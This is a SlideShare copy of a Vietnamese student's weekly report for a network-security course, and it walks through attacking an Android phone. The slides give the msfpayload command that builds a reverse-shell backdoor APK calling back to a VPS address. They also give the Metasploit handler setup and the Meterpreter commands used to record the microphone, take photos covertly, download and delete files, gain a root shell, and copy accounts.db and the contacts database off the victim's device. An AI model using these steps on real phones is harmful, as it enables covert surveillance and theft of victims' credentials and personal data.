Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Athena tuần 5

207 views

Published on

  • Be the first to comment

  • Be the first to like this

Athena tuần 5

  1. 1. TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG & AN NINH MẠNG QUỐC TẾ ĐỀ TÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH SÁCH CONTACT, TIN NHẮN TRÊN ĐIỆN THOẠI SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI BÁO CÁO TUẦN 5 GVHD: VÕ ĐỖ THẮNG SVTH: TRẦN THANH THÔNG MSSV: 1120168
  2. 2. TẤN CÔNG MÁY ANDROID TỪ MÁY VPS 1. Tạo ứng dụng chứa mã độc trên Kali Linux: Trước tiên, ta cần một ứng dụng backdoor để nạn nhân cài vào điện thoại Android Bước 1: Khởi động máy ảo Kali Linux. Mở Terminal . Bước 2: Thực hiện lệnh sau để tạo mã độc từ payload Meterpreter: “msfpayload android/meterpreter/reverse_tcp lhost =<IP máy VPS> lport=<Mã port muốn dùng> R > <đường dẫn lưu trữ> / <tên file>” Giả sử: msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.162 lport=4444 R> /root/Desktop/hack.apk 2. Tấn công đi ện thoại Android: Bước 1: Tại máy VPS, mở Metasploit Console. Đợi phần mềm khởi động, có thể mất vài chục phút. Bước 2: Tiến hành thiết đặt payload bằng các lệnh  “ use exploit/multi/handler ”  “ set payload android/meterpreter/reverse_tcp ”  “ set lhost 14.0.21.162 ”  “ set lport 4444 ”  “ run ” Ta phải sử dụng đúng payload, lhost, lport mà ta đã dùng để tạo backdoor ở trên. Bước 3: Sau đó, Metasploit sẽ khởi động 1 handler để chờ đợi sự kết nối từ máy Android nạn nhân. Giả sử nạn nhân truy cập vào ứng dụng backdoor, ta sẽ nhận được thông báo như sau:
  3. 3. Bước 4: Dùng lệnh “help” để kiểm tra các lệnh ta có thể thao tác 3. Các phương thức tấn công được sử dụng: Sau đây sẽ giới thiệu 1 số phương thức để tân công máy Android nạn nhân. 3.1 Ghi âm lén: Sử dụng lệnh: “ record_mic <số giây ghi âm> ” 3.2 Sử dụng camera: Xem danh sách webcam của thiết bị: “ webcam_list ” Chụp ảnh lén: “webcam_snap <mã camera>”
  4. 4. 3.3 Tải và xóa file bất kỳ từ bộ nhớ sdcard: Di chuyển vào thư mục bằng lệnh: cd Tải về bằng lệnh: download <tên file> Xóa tập tin bằng lệnh: rm <tên file> 3.4 Truy cập trực ti ếp vào hệ thống:
  5. 5. Truy cập vào hệ thống bằng lệnh: “shell ” > “su” Kiểm tra máy đã root hay chưa bằng lệnh: “whoami ” Nếu kết quả trả về là “whoami: unknown uid 0” là máy đã được root. Ta có thể tiếp tục tấn công. 3.5 Truy cập và khai thác tài khoản người dùng: Thực hiện lệnh để vào xem file lưu tài khoản người dùng: “cd /data/system” > “ls – l” Copy file về thẻ nhớ sdcard bằng lệnh: “cp accounts.db /sdcard”
  6. 6. Trở về meterpreter và tải file accounts.db về:
  7. 7. Sử dụng tiện ích SQLite Manager trên Firefox để xem nội dung của accounts.db
  8. 8. 3.6 Truy cập và đánh cắp danh bạ điện thoại: Thực hiện lệnh để vào xem file lưu trữ danh bạ điện thoại: “cd /data/data/com.android.providers.contacts/databases” Copy về thẻ sdcard và tải về máy
  9. 9. Xem nội dung của contacts2.db bằng SQLite Manager
  10. 10. 3.7 Một số câu l ệnh khác: - Để biết thêm về các lệnh có thể thực hiện ta dùng help - Để xem thông tin về máy, nhập lệnh sysinfo - Để xem các tác vụ đang chạy gõ ps - Xem ip của máy bị hack ta gõ ipconfig - Xem danh sách thư mục, file gõ ls
  11. 11. - Để upload gõ lệnh upload - ls -l danh mục file và các quyền - Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền /DATA /DATA/APP /DATA/SYSTEM /DATA/SYSTEM/accounts.db /DATA/SYSTEM/SYNC/accounts.xml /SYSTEM/APP/ - Để xem danh sách và down load các file hay thay đổi các file trong ROM Đầu tiên phải gõ lệnh SU để có toàn quyền truy cập Để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename Ví dụ chmod -R 777 /data - Ctrl + C để quay lại

×